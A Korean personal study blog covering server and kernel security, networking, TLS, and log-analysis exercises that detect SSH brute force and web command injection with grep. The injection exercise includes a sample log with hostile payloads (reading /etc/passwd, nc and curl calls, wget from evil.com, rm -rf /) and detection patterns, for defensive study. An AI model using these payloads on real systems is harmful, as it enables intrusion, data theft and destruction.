Jaehyun's IT

서버 보안

천천히, 한 걸음씩 — Sun, 22 Feb 2026 14:37:43 +0900

*시스템 : 보안의 통상적인 관점에서의 시스템은 os 및 서버를 칭한다.
그러나 "운영체제(OS)는 시스템 자원을 관리한다"는 문맥에서의 시스템은 컴퓨터 하드웨어를 포함하는 의미로도 사용된다.

1. 컴퓨터 하드웨어(시스템 자원)의 구성 요소

CPU : 중앙처리장치(연산 및 제어 장치)
RAM : 주기억장치 (휘발성)
DISK : 보조기억장치 (데이터를 영구적으로 보관)

2. 운영체제의 핵심 구성 요소

커널 : 주기억장치에 상주하며 사용자 프로그램을 관리하는 운영체제의 핵심 역할로 시스템 자원을 관리한다.
셸 : 사용자가 입력한 명령어를 해석하고 시스템 콜을 호출하여 커널에 전달하고 그 결과를 출력하는 명령어 인터페이
파일 시스템 : 정보를 저장하는 기본적 구조로, 시스템 관리 및 기본 환경을 제공하고, 계층적인 트리 구조 형태

3. 커널 레벨과 유저 레벨

개요 : 통상적으로 OS(엄밀히 구분하면 커널)는 시스템 자원을 관리하기에 CPU의 Ring3, Ring0 아키텍처를 적용하며, 이에 따라 대부분의 os에는 커널 레벨과 유저 레벨이 나뉘게 된다.
유저 레벨(Ring 3)
- 정의 : 사용자가 실행하는 대부분의 애플리케이션이 동작하는 영역 (웹 서버, DB, 쉘, 일반 프로세스 등)
- 보안 이슈 : SQL 인젝션, 웹쉘, 크리덴셜(PW)탈취
- 특징 : 보안 이벤트 발생 시 감사(Audit) 트레일 및 애플리케이션 로그가 정상적으로 기록
- 보안 : 방화벽(네트워크 보안), 웹 방화벽(waf), 안티바이러스(백신) 등 애플리케이션 및 네트워크 계층 통제
커널 레벨(Ring 0)
- 정의 : 하드웨어(CPU·RAM·DISK)를 직접 제어하는 운영체제의 핵심 영역
- 보안 이슈 : 루트킷, 커널 익스플로잇, bpfdoor
- 특징 : 커널 제어권이 탈취될 경우 시스템 전반의 무결성이 훼손된다. 공격자가 시스템 콜을 후킹하여 감사 로그 기록을 무력화하고, 특정 프로세스 및 파일을 시스템상에서 완벽하게 은닉할 수 있어 매우 치명적이다.

4. 서버 보안의 핵심 원칙 4가지

최소 권한의 원칙 (Least Privilege)
- 정의 : 사용자나 프로세스가 작업을 수행하는 데 필요한 가장 낮은 수준의 권한만 부여하는 것
- 예시 (리눅스 환경)
  - 모든 작업을 root로 하지 않고 일반 유저 생성 후 사용
  - 관리자 작업 시에만 sudo 사용
  - 웹 서버 (Apache·Nginx) 구동 시 nobody나 www-data와 같은 저권한 계정 사용
  - 파일 권한 설정시 777권한 사용 금지
방어 심층의 원칙 (Defense in Depth)
- 정의 : 단일 보안 계층에 의존하지 않고 여러 겹의 보안 통제를 중첩하여 적용하는 것
- 예시 (리눅스 환경)
  - Well known 포트 번호 변경 (기본 ssh 포트 번호 변경)
  - 방화벽(iptables, ufw 등)을 통한 특정 ip 접근 제한
  - 비밀번호 대신 공개키 기반 인증 방식 사용
  - Fail2ban 등을 활용한 무작위 대입 공격 자동 차단
최소화의 원칙(Minimization)
- 정의 : 시스템의 복잡도를 줄이고, 외부와 연결되는 공격 표면을 최소한으로 유지하는 것
- 예시 (리눅스 환경)
  - 사용하지 않는 포트와 서비스(데몬) 비활성화 (systemctl disable)
  - 불필요한 패키지 설치 금지 및 기존 불필요 패키지 삭제
  - 기본 설정을 그대로 사용하지 않고 보안이 강화된 설정으로 변경
책임 추적성의 원칙 (Accountability)
- 정의 : 시스템에서 발생하는 모든 중요 이벤트를 로그로 남겨 문제 발생 시 원인과 행위자를 명확히 식별하고 증명할 수 있도록 하는 것
- 예시 (리눅스 환경)
  - 공용 계쩡 사용 및 root 비밀번호 공유 금지 (sudo 사용 권장)
  - 중요 로그 파일(/var/log/syslog, /var/log/auth.log 등)의 무결성 보장 및 별도 서버에 분리 보관

5. 커널 보안의 핵심요소

시스템 콜
- 정의 : 유저 레벨의 애플리케이션이 커널 레벨로 넘어가 하드웨어 제어 등 특권 명령을 요청하기 위한 통로
- 종류
  - 프로세스 제어
    - execve : 프로그램 실행
    - fork() : 프로세스 복제
    - exit() : 종료
  - 파일 조작
    - read : 파일 읽기
    - write : 파일 쓰기 및 수정
    - open : 파일 열기
  - 통신
    - socket : 통신 창구 열기
    - send(), recv() : 데이터 송수신
  - 장치 관리
    - ioctl : 장치 제어 파라미터 설정 등 물리적 하드웨어(키보드, 모니터, 하드디스크 등) 접근
  - 정보 유지
    - getpid() : 현재 프로세스 번호 확인
    - gettimeofday() : 시스템 시간 확인
- 보안 관점 : 해커가 루트 권한을 획득한 뒤, 커널 내부의 시스템 콜 테이블을 조작하여 감사 로그를 우회하거나 악성 프로세스를 은닉할 수 있음
리눅스 케이퍼빌리티
- 정의 : 기존의 이분화된 권한(root외에는 일반 사용자) 구조에서 벗어나, 막강한 root권한을 약 40여 개의 세분화된 권한 조각으로 쪼개서 관리하는 메커니즘
- 활용 : 웹 서버 구동 시 전체 파일 시스템을 제어할 수 있는 root 권한 대신 1024번 이하의 특권 포트만 열 수 있는 권한(CAP_NET_BIND_SERVICE)만 부여
- 정 사항 : 보안상 취약할 수 있는 setuid 대신 시스템 프로세스에 필요한 최소한의 케이퍼빌리티만 부여하여 최소 권한 원칙을 커널 레벨에서 기술적으로 구현 가능
LSM (Linux Security Modules) - 커널 보안 프레임워크
- 정의 : 리눅스 커널이 악성 행위를 원천적으로 방지하기 위해 제공하는 강제적 접근 통제(MAC) 기반 보안 프레임워크
- 활용 예시 : SElinux(레드햇 개열), AppArmor(데비안/우분투 계열)
- 핵심 원리 : 시스템 콜이 실행되기 전 마지막으로 LSM 훅(Hook)을 거치게 되며, 루트 권한을 탈취한 해커라도 사전 정의된 보안 정책에 허용되지 않은 파일이나 네트워크 자원에는 접근할 수 없다. (커널 레벨 방어의 꽃)
- 한계 : 커널 자체에 존재하는메모리 변조 취약점을 통해 커널 메모리 영역을 직접 조작 시 무력화 혹은 우회될 수 있다.
eBPF (Extended Berkeley Packet Filter)
- 정의 : 커널 소스 코드를 수정하거나 재부팅하지 않고도 커널 내부의 안전한 샌드박스 환경에서 사용자 정의 프로그램을 실행하여 시스템과 네트워크를 모니터링하는 최신 기술
- 보안 관점 : 과거에는 커널의 동작을 감시하기 위해 커널 모듈(LKM)을 직접 심어야 했으나 이는 시스템 전체 다운의 리스크가 있었음. 반면 eBPF는 이러한 리스크 없이 안전하게 감시할 수 있어 최신 클라우드 및 서버 보안 솔루션의 핵심 기술로 평가받는다.

웹 로그 기반 명령 줄 주입(Command Injection) 탐지 정규표현식 로직

천천히, 한 걸음씩 — Fri, 30 Jan 2026 20:03:23 +0900

Plaintext

192.168.0.1 - - [10/Jan/2026:14:00:01] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"

10.10.10.1 - - [10/Jan/2026:14:00:05] "GET /about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"

192.168.0.5 - - [10/Jan/2026:14:00:10] "GET /images/logo.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"

172.16.10.1 - - [10/Jan/2026:14:00:15] "GET /login.php HTTP/1.1" 200 1500 "-" "Mozilla/5.0"

111.111.111.111 - - [10/Jan/2026:14:01:05] "GET /ping.php?addr=127.0.0.1;cat%20/etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"

192.168.0.2 - - [10/Jan/2026:14:01:10] "GET /search?q=cat+food HTTP/1.1" 200 500 "-" "Mozilla/5.0"

192.168.0.3 - - [10/Jan/2026:14:01:15] "GET /search?q=notebook;mouse HTTP/1.1" 200 521 "-" "Mozilla/5.0"

222.222.222.222 - - [10/Jan/2026:14:02:10] "GET /board/view?id=500|nc%20192.168.100.100%201234 HTTP/1.1" 500 124 "-" "Python-urllib/3.8"

192.168.0.4 - - [10/Jan/2026:14:02:15] "GET /shop/list?category=shoes|clothes HTTP/1.1" 200 1500 "-" "Mozilla/5.0"

192.168.0.5 - - [10/Jan/2026:14:02:20] "GET /download/wget-manual.pdf HTTP/1.1" 200 35000 "-" "Mozilla/5.0"

133.133.133.133 - - [10/Jan/2026:14:03:00] "GET /calc.php?value=$(whoami) HTTP/1.1" 403 201 "-" "curl/7.68.0"

192.168.0.6 - - [10/Jan/2026:14:03:05] "GET /api/price?val=$100 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"

192.168.0.7 - - [10/Jan/2026:14:03:10] "GET /assets/jquery.min.js HTTP/1.1" 200 50000 "-" "Mozilla/5.0"

224.224.234.253 - - [10/Jan/2026:14:04:00] "GET /mypage?name=%3Bcat%20/etc/shadow HTTP/1.1" 200 512 "-" "Mozilla/5.0"

192.168.0.8 - - [10/Jan/2026:14:04:05] "GET /search?q=User[1] HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.9 - - [10/Jan/2026:14:04:10] "GET /board/view?id=100&page=1 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"

124.1.1.213 - - [10/Jan/2026:14:05:00] "GET /cmd.php?cmd=%7C%20/bin/sh HTTP/1.1" 200 1024 "-" "Mozilla/5.0"

192.168.0.10 - - [10/Jan/2026:14:05:05] "GET /blog/post.php?tag=c++ HTTP/1.1" 200 3000 "-" "Mozilla/5.0"

192.168.0.11 - - [10/Jan/2026:14:05:10] "GET /help/faq.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"

152.142.16.66 - - [10/Jan/2026:14:06:00] "GET /ping.php?ip=127.0.0.1%3Bwget%20http://evil.com/shell.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.12 - - [10/Jan/2026:14:06:05] "GET /images/cat_picture.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"

192.168.0.13 - - [10/Jan/2026:14:06:10] "GET /manual/nc_guide.html HTTP/1.1" 200 1500 "-" "Mozilla/5.0"

177.177.177.177 - - [10/Jan/2026:14:07:00] "GET /admin?user=%24%7Bwhoami%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"

192.168.0.14 - - [10/Jan/2026:14:07:05] "GET /api/v1/users?id=1|2|3 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"

192.168.0.15 - - [10/Jan/2026:14:07:10] "GET /js/script.js?v=1.0; HTTP/1.1" 200 3000 "-" "Mozilla/5.0"

188.188.188.188 - - [10/Jan/2026:14:08:00] "GET /input?data=%3B%20ls%20-al HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.16 - - [10/Jan/2026:14:08:05] "GET /search?q=hello%20world HTTP/1.1" 200 500 "-" "Mozilla/5.0"

192.168.0.17 - - [10/Jan/2026:14:08:10] "GET /login.do;jsessionid=ABC1234 HTTP/1.1" 200 512 "-" "Mozilla/5.0"

199.199.199.199 - - [10/Jan/2026:14:09:00] "GET /check?host=localhost%7Ccurl%20http://attacker.com HTTP/1.1" 200 124 "-" "curl/7.68.0"

192.168.0.18 - - [10/Jan/2026:14:09:05] "GET /product/view?id=100$200 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"

192.168.0.19 - - [10/Jan/2026:14:09:10] "GET /download/report.pdf HTTP/1.1" 200 50000 "-" "Mozilla/5.0"

123.123.123.123 - - [10/Jan/2026:14:10:00] "GET /test.php?cmd=%24(id) HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.20 - - [10/Jan/2026:14:10:05] "GET /images/banner.gif HTTP/1.1" 200 10240 "-" "Mozilla/5.0"

192.168.0.21 - - [10/Jan/2026:14:10:10] "GET /contact.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"

234.234.234.234 - - [10/Jan/2026:14:11:00] "GET /api?q=1%3B%20/bin/cat%20/etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"

192.168.0.22 - - [10/Jan/2026:14:11:05] "GET /search?q=100%25 HTTP/1.1" 200 500 "-" "Mozilla/5.0"

192.168.0.23 - - [10/Jan/2026:14:11:10] "GET /board/list HTTP/1.1" 200 3000 "-" "Mozilla/5.0"

245.245.245.245 - - [10/Jan/2026:14:12:00] "GET /shell?cmd=%7Cwhoami HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.24 - - [10/Jan/2026:14:12:05] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.25 - - [10/Jan/2026:14:12:10] "GET /sitemap.xml HTTP/1.1" 200 5000 "-" "Mozilla/5.0"

156.252.156.156 - - [10/Jan/2026:14:13:00] "GET /run?exec=%60id%60 HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.26 - - [10/Jan/2026:14:13:05] "GET /news/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"

192.168.0.27 - - [10/Jan/2026:14:13:10] "GET /weather?city=Seoul HTTP/1.1" 200 500 "-" "Mozilla/5.0"

227.227.227.27 - - [10/Jan/2026:14:14:00] "GET /debug?val=%26%26%20cat%20/etc/hosts HTTP/1.1" 200 512 "-" "Mozilla/5.0"

192.168.0.28 - - [10/Jan/2026:14:14:05] "GET /info.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"

192.168.0.29 - - [10/Jan/2026:14:14:10] "GET /status HTTP/1.1" 200 100 "-" "Mozilla/5.0"

178.178.178.178 - - [10/Jan/2026:14:15:00] "GET /login?user=admin%27%20or%201=1-- HTTP/1.1" 200 1000 "-" "SQLMap/1.4"

192.168.0.30 - - [10/Jan/2026:14:15:05] "GET /main.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"

192.168.0.31 - - [10/Jan/2026:14:15:10] "GET /app.js HTTP/1.1" 200 5000 "-" "Mozilla/5.0"

189.189.189.189 - - [10/Jan/2026:14:16:00] "GET /api/check?id=1;%20/bin/rm%20-rf%20/ HTTP/1.1" 200 100 "-" "Mozilla/5.0"

분석 목표 (Mission)

이 로그 파일에서 진짜 공격자 IP만 추출하기

세미콜론(;, %3B) 공격: 단순 검색어나 jsessionid는 제외하고, 뒤에 cat, ls, wget, rm 같은 명령어가 오는 것.
파이프(|, %7C) 공격: shoes|clothes 같은 단순 나열은 제외하고, 뒤에 nc, curl, whoami, /bin/sh 등이 오는 것.
달러($, %24) 공격: $100(금액)은 제외하고, $(...) 또는 ${...} 형태로 명령어 실행을 시도하는 것.

인코딩 공격도 중요하나 절대 경로 명령어도 유의할 것.

%7C : |

%20 : space

%3B : ;

%7B ; {

%7D : }

%24 : $

%60 : &

5 : cat%20/etc/passwd

8 : nc%20192.168.100.100

11 : calc.php?value=$(whoami)

14 : cat%20/etc/shadow

17 : cmd=%7C%20/bin/sh [당장은 문제가 없어도, 공격 의도로 파악 가능]

20 : wget%20http://evil.com/shell.php [wget https 형식은 위험]

23 : user=%24%7Bwhoami%7D [리눅스에서는 무시되나 자바/파이썬/php 등의 템플릿에서는 ${...}가 코드 실행이라는 의미로 쓰임 혹은 (의 오타로 탐지

26 : input?data=%3B%20ls%20-al

29 : check?host=localhost%7Ccurl%20http://attacker.com

32 : GET /test.php?cmd=%24(id) HTTP/1.1" 200 100 [리눅스 쉘은 일단 괄호 안의 값을 실행하기에 echo를 안 붙여도 처음 값이 에러로 출력]

35 : GET /api?q=1%3B%20/bin/cat%20/etc/passwd HTTP/1.1" 200 512

38 : GET /shell?cmd=%7Cwhoami HTTP/1.1

41 : GET /run?exec=%60id%60 HTTP/1.1

44 : /debug?val=%25%25%20cat%20etc/hosts HTTP/1.1

- : ;cat /etc/passwd

50 : /api/check?id=1;%20/bin/rm%20-rf%20/ HTTP/1.1

로직 취합

grep -E 'whoami' access.log

grep -E '(cat|nc|ls|curl|wget)( |%20){1,}' access.log

grep -E '(%7C|%3B|%26|%24|[\`\$\|\;&]){1,}( |%20|/)*bin' access.log

grep -E 'cmd=(\$|%24)' access.log

grep -E 'whoami|(cat|nc|ls|curl|wget)( |%20){1,}|cmd=(\$|%24)|(%7C|%3B|%26|%24|[\`\$\|\;&]){1,}( |%20|/)*bin' access.log

무차별 대입 공격 (Brute Force) 탐지 정규표현식 로직

천천히, 한 걸음씩 — Wed, 21 Jan 2026 21:04:31 +0900

표: 단순 문자열 매칭이 아닌 "빈도(Threshold)" 기반 탐지
핵심: grep, awk, sort, uniq를 조합하여 동일 IP에서 3회 이상 실패한 IP만 추출.

상황: SSH 접속 로그(auth.log). 비밀번호를 계속 틀리는 IP를 찾아 차단해야 한다. 3번 미만 실수는 보류.

*테스트 데이터 (auth.log):

Plaintext

Mar 10 10:00:01 server sshd[100]: Failed password for root from 192.168.0.100 port 22

Mar 10 10:00:02 server sshd[101]: Accepted password for admin from 10.0.0.5 port 2222

Mar 10 10:00:03 server sshd[102]: Failed password for root from 192.168.0.100 port 22

Mar 10 10:00:04 server sshd[103]: Failed password for user1 from 172.16.0.50 port 5432

Mar 10 10:00:05 server sshd[104]: Failed password for root from 192.168.0.100 port 22

Mar 10 10:00:06 server sshd[105]: Accepted password for user1 from 172.16.0.50 port 5432

Mar 10 10:00:07 server sshd[106]: Failed password for admin from 192.168.0.100 port 22

Mar 10 10:00:08 server sshd[107]: Failed password for invalid user guest from 192.168.0.100 port 22

Mar 10 10:01:00 server sshd[108]: Failed password for test from 10.10.10.10 port 3333

Mar 10 10:01:01 server sshd[109]: Failed password for test from 10.10.10.10 port 3333

Mar 10 10:01:02 server sshd[110]: Failed password for test from 10.10.10.10 port 3333

Mar 10 10:02:00 server sshd[111]: Failed password for dev from 1.1.1.1 port 4444

Mar 10 10:02:01 server sshd[111]: Failed password for dev from 1.1.1.1 port 4444

Mar 10 10:03:00 server sshd[112]: Accepted password for manager from 192.168.0.200 port 22

Mar 10 10:03:01 server sshd[113]: Failed password for manager from 192.168.0.200 port 22

Mar 10 10:03:02 server sshd[114]: Failed password for manager from 192.168.0.200 port 22

Mar 10 10:03:03 server sshd[115]: Failed password for manager from 192.168.0.200 port 22

Mar 10 10:04:01 server sshd[116]: Accepted password for admin from 8.8.8.8 port 22

Mar 10 10:04:02 server sshd[117]: Accepted password for admin from 8.8.8.8 port 22

Mar 10 10:04:03 server sshd[118]: Accepted password for admin from 8.8.8.8 port 22

Mar 10 10:05:01 server sshd[119]: Failed password for user2 from 172.16.100.100 port 22

Mar 10 10:05:02 server sshd[120]: Failed password for user2 from 172.16.100.100 port 22

Mar 10 10:05:03 server sshd[121]: Accepted password for user2 from 172.16.100.100 port 22

*탐지해야 할 ip

10.10.10.10

192.168.0.100

192.168.0.200

정답

grep Failed auth.log | awk '{ print $(NF-2) }' | sort -n | uniq -c | sort | awk '$1 >=3 { print $2 }'

리눅스 정규 표현식 및 입출력 흐름 제어

천천히, 한 걸음씩 — Wed, 14 Jan 2026 23:10:19 +0900

[]: 문자 클래스 (예: [0-9] 숫자만)
grep "abc[1-9]" -.txt : abc로 시작하면서 1~9가 붙은 것을 찾기
문자열 처리의 경우 \[와 같이 진행할 것. \는 뒤의 하나를 문자열 취급
예) grep "^\[공격\]" a.log
[^ ]: 부정 (예: [^0-9] 숫자가 아닌 것)
[기타] 리다이렉션 연산자

정규표현식은 '따옴표 처리, 문자열은 "쌍따옴표 처리하기

-> 리눅스에서 정규표현식 사용 시 쉘의 해석, grep의 해석 총 2단계를 거치기에
쉘의 해석을 스킵하고 grep의 해석만 하기 위해 ' 따옴표를 사용한다.

또한 기본적으로 grep -E를 사용하는 것이 바람직함. +, ?(ERE)까지 포함하여 사용하되 상단의 특수문자는
이스케이프 처리해주는 것이 효율적이다.

입출력 흐름 제어 (Redirection & Pipe)

명령어와 명령어 사이, 또는 파일로 데이터를 주고받는 가장 기초적인 길(Path)을 만드는 문법

기호	이름	의미	예시
\|	파이프	파이프 (Pipe)	앞 명령어의 표준 출력(Stdout)을 뒤 명령어의 표준 입력(Stdin)으로 연결
>	덮어쓰기 (Overwrite)	명령어의 결과를 파일로 저장 (기존 내용 삭제됨)	echo "Start" > log.txt
>>	이어쓰기 (Append)	명령어의 결과를 파일 끝에 추가 (기존 내용 보존)	echo "End" >> log.txt
<	입력 재지정 (Read)	파일의 내용을 명령어의 입력으로 넣음	sort < data.txt (data.txt 내용을 정렬)
2>	표준 에러 재지정	에러 메시지(Standard Error)만 따로 파일로 저장	find / -name "file" 2> error.log (접근 권한 에러 등을 파일로 뺌)
/dev/null	널 디바이스 (Null Device)	들어오는 모든 데이터를 즉시 폐기하는 특수 장치 파일 (쓰레기통 역할)	command > /dev/null (결과를 화면에도, 파일에도 남기지 않고 버림)

네트워크 및 프로토콜 (3. IP)

천천히, 한 걸음씩 — Wed, 7 Jan 2026 22:16:54 +0900

Internet Layer

Ip주소를 기반으로 경로를 설정하고 패킷을 전송하는 계층
라우팅 : ip헤더에 있는 목적지 ip주소를 읽어 경로를 결정하는 작업

동적 경로 : 관리자의 개입 없이 네트워크 상황 변화에 따라 인접 라우터 간 자동으로 경로 정보 교환 설정
- IGP : 단일 AS 내에서 라우팅 정보를 교환하는 프로토콜로 Distance Vector와 Link State Vector가 있다.
  - Distance Vector(거리 벡터) : 최단 경로를 구하는 벨만 포트 알고리즘 기반 RIP(홉수기반)
  - Link State(링크 상태) : 최소 신장 트리를 구하는 다익스트라 알고리즘 기반 OSPF
- EGP : 다른 그룹과의 라우팅 정보를 교환하는 프로토콜

2. IP

네트워크를 통해 데이터 패킷을 라우팅하고 전달하는 프로토콜로, 비신뢰성·비연결형의 특징이 있다.
IP header 구조

- Version : IPv4 or IPv6
- Total Length : IP 패킷의 byte 수
- Identification : Host에서 보낸 패킷 식별
- Flags & Offset : IP 단편화 정보
- TTL : 패킷이 통과할 수 있는 라우터 수
IP 주소의 구조
- IP 주소는 클래스로 분류되며 네트워크 ID와 호스트 ID로 분류할 수 있다.

클래스 구조

Class	첫 옥텟 범위	고정 비트	서브넷	네트워크 / 호스트 비트	네트워크 당 가용 호스트 수
A	1~126	0xxxxxxx	/8	네트워크 7bit / 호스트 24bit	16,777,216
B	128~191	10xxxxxx...	/16	네트워크 14bit / 호스트 16bit	65,536
C	192~223	110xxxxx...	/24	네트워크 21bit / 호스트 8bit	256 (x.x.x.0 ~ x.x.x.255)

서브넷팅
- 주어진 네트워크 주소를 작게 나누어 여러 개의 서브넷으로 구성하는 것
- vlan : lan을 논리적으로 분할하는 것

✓ 예를 들어 /27일 경우 8개의 서브넷, 32개의 호스트

3. ICMP

인터넷 제어 메시지 프로토콜로, 오류 보고와 질의 메시지가 주요 기능

4. ISP

LAN과 LAN을 연결하여 외부 인터넷 접속을 가능하게 하는 인터넷 서비스 제공 업체
스위치와 라우터가 있더라도, 다른 lan과 연결할 수 없으면 인터넷 사용이 불가능하다. (당연히 라우터가 있어도 Lan)

✓ 기업 환경에서는 상단 구조를 따르기도 하나 L3백본 스위치를 두고 그 위의 방화벽이 라우팅 기능까지 수행한다.

5. VPN vs 원격접속

VPN : 공중망을 이용하여 사설망에 연결된 것처럼 암호화, 터널링을 이용해 안전하게 통신할 수 있도록 가상 사설망 구축 기술

원격접속 : 사용자가 다른 위치에서 PC또는 서버에 액세스하여 제어할 수 있는 기술

구분	VPN (가상 사설망)	원격접속 (Remote Desktop)
목적	네트워크 확장: 안전한 통로 확보	제어: 특정 기기 조작
IP 할당	사설 대역 IP를 새로 부여받음	대상 기기의 IP/포트로 접속함
사용 경험	사설망 내 모든 자원을 내 것처럼 사용	대상 PC의 화면을 보고 조작함
성능 영향	내 PC의 사양과 네트워크 속도가 중요	대상 PC의 사양과 응답 속도가 중요
대표 사례	재택근무 시 사내 인트라넷 접속	기술 지원, 사무실 PC 원격 제어

6. 인터넷 통신 프로토콜

NAT : 내부 ip를 공인 ip로 변환해주는 네트워크 주소 변환 프로토콜
Bridge : https://developerin.tistory.com/18
Host-only : -

7. 네트워크 접근 계층

논리적 주소인 ip주소를 물리적 mac주소로 변환하고 에러 제어와 흐름 제어를 수행한다.
인접 노드 (point-to-point) 간 연결 및 데이터 전송 기능을 한다.

HTTPS/SSL Handshake

천천히, 한 걸음씩 — Tue, 2 Dec 2025 12:42:38 +0900

학창시절에 관련 내용을 공부한 적이 있었지만,

간단한 개념 위주로만 공부한 것 같아 보다 심층적으로 공부한 내용을 정리해보고자 한다.

SSL HandShake 과정 요약

SSL HandShake

1. ClientHello : 통신 방식과 암호화 알고리즘을 서버에 제안하는 단계

2. ServerHello : 통신에서 사용할 암호화 방식과 세션 정보를 확정하는 단계

3. Certificate : 서버 인증서 전달 및 검증 단계

4. Server Key Exchange/ServerHelloDone : 인증서에 공개키가 없을 경우 Server Key Exchange 단계에서 공개키를 클라이언트에 전달하고, ServerHelloDone을 통해 서버 초기 설정 완료를 알리는 단계

5. Client Key Exchange : 클라이언트가 생성한 Pre-Masteer-Secret을 서버 공개키로 암호화하여 서버에 전달하는 단계

6. Session Key Generation : 서버가 개인키로 Pre-Masteer-Secret을 복호화하여 동일하게 가지고 Master Secret을 만들어 세션 키를 생성하는 단계

7. ChangeCipherSpect/Finished : SSL/TLS Handshake 종료 및 통신 준비 완료 단계

참고 사항 : Client는 Server를 3단계인 Certificate과정을 통해서 검증하고, Server는 Client를 통상적으로 SSL Handshake 과정에서 진행하지 않고, ip,포트, 로그인 정보 등으로 검증한다.

SSL Handshake의 상세 통신 과정

1. ClientHello : 클라이언트가 서버와 안전한 통신을 시작하기 위해 연결을 요청하는 단계로, 다음과 같은 정보를 제공한다.

- TLS Version : Client에서 지원하는 TLS Version

- Random Data : Client에서 생성한 임의의 난수로, 이후 세션 키 생성에 사용된다.

- Session ID : 최초 Full Handshake를 위해 사용되는 ID

- Cipher Suites : Client가 지원하는 암호화 알고리즘의 집합으로, Server에 Ciper Suites목록을 전송한다.

2. Server Hello : 서버가 ClientHello 패킷을 받아 클라이언트의 Cipher Suite 중 하나를 선택하고 통신 환경을 확정하는 단계로, 다음과 같은 정보를 제공한다.

- Selected Suite : 클라이언트가 제안한 암호화 방식 목록 중 서버가 선택한 Ciper Suite

- Random Data : Server에서 생성한 임의의 난수로, 이후 세션 키 생성에 사용된다.

- 클라이언트 인증서 요청(선택 사항)

3. Certificate : 서버가 자신의 SSL 인증서를 클라이언트에 전달하여 신원을 증명하는 단계로, 클라이언트가 인증서를 확인하고 서버를 신뢰할 수 있도록 다음과 같은 정보를 제공한다.

- Signature Value : 클라이언트가 CA 공개키를 사용해서 검증해야 할 값

- SubjectPublicKeyInfo : 서버 공개키가 포함된 SSL 인증서

- Signature Algorithm : 인증서 서명(Signature)과 알고리즘

4. Server Key Exchange/ServerHelloDone : 이전 단계에서 인증서에 공개키가 포함되지 않은 경우 서버가 직접 공개키를 전달하며 포함된 경우 생략되는 단계이다. 이후 서버는 설정 완료를 알린다.

5. Client Key Exchange : 클라이언트는 안전한 통신을 위해 Pre-Master Secret이라는 임시 비밀 값을 생성하고, 이것을 서버의 공개키를 통해 암호화하여 서버로 전송한다.

6. Session Key Generation : 서버는 클라이언트로부터 전달받은 Pre-Master Secret을 개인키로 해독하고, 서버와 클라이언트는 각각의 Random Data와 조합해 Master Secret을 만들어 각자 Session Key를 생성한다.

7. ChangeCipherSpec / Finished : 서버와 클라이언트는 ChangeCipherSpec 패킷을 통해 최종 암호화 알고리즘과 Session Key를 통해 암호화가 전환됨을 알리고 Finished 패킷을 세션키로 암호화하여 교환함으로 SSL Handshake를 종료한다.

이미지 출처 : Cloudflare (https://www.cloudflare.com/ko-kr/learning/cdn/cdn-ssl-tls-security/)

네트워크 및 프로토콜 (2. HTTP 세션 연결 과정)

천천히, 한 걸음씩 — Thu, 27 Nov 2025 13:56:57 +0900

HTTP 이론 및 통신 과정

정의 : 인터넷 접속을 위한 표준 프로토콜
특징
- HTTP는 TCP프로토콜을 사용하여 신뢰성 있게 데이터를 송수신한다.
- HTTP v1.0은 요청 -> 응답 이후 바로 연결을 종료하지만
  v1.1의 경우 어느정도 대기 후 연결을 종료한다. (keep-alive 방식)
- HTTP는 기본적으로 state-less라는 특성을 가지고 있다. (HTTP 요청 -> 응답 간의 데이터를 저장하지 않음)
  - 클라이언트는 쿠키에 세션 ID를 저장하고, 서버는 세션에 사용자 상태를 저장하므로 웹은 stateful하게 작동한다.

이 특징들을 토대로 TCP 관점을 포함한 HTTP의 세션 연결 과정은 다음과 같다.

[2~4번은 tcp 3 way handshake과정이며 종료 과정은 tcp 4 way handshake이다.]

1. 웹 서버는 서비스 포트(80)를 개방 후 클라이언트의 요청이 오기 전까지 대기한다. (Listening)

2. 클라이언트는 웹 서버 접속 요청(SYN)을 시도한다.

3. 서버는 요청에 대한 응답(SYN+ACK)를 전송한다.

4. 클라이언트는 응답에 대한 확인 메시지(ACK)를 전송한다.

5. 예를 들어 TCP 헤더의 플래그 중 TCP-PUSH일 경우 빠른 처리를 위해 HTTP-GET 페이지를 요청한다.

6. 서버 측은 클라이언트 요청에 대한 점검을 한다. (해당 Checksum을 통한 무결성 확인은 TCP에서 수행한다.)

7. 요청 HTML 페이지를 클라이언트에 전송한다.

8. 클라이언트는 전송 데이터를 점검한다. (해당 Checksum을 통한 무결성 확인은 TCP에서 수행한다.)

9. Http는 statless하므로 세션 상태를 기억하지 않아 세션을 종료한다는 개념이 없어, TCP close로 세션을 종료한다.

네트워크 및 프로토콜 (1. OSI 7 Layer)

천천히, 한 걸음씩 — Sun, 26 Oct 2025 19:26:31 +0900

응용 계층 : 사용자에게 최종 서비스 제공
표현 계층 : 데이터의 압축, 암호화
세션 계층 : 세션 연결 및 동기화, 통신 방식 결정
전송 계층 : 송수신자 간의 종단간 통신을 담당하며, 데이터 전송의 신뢰성과 효율성을 보장하는 계층
네트워크 계층 : 서로 다른 네트워크 간에 ip 주소를 기반으로 최적 경로를 선택해 패킷을 전달하는 계층
데이터링크 계층 : 동일 네트워크 내에서 mac 주소를 기반으로 인접 노드 (Point-to-Point)간 프레임을 신뢰성 있게 전달하며, 흐름 제어와 에러 제어를 담당하는 계층
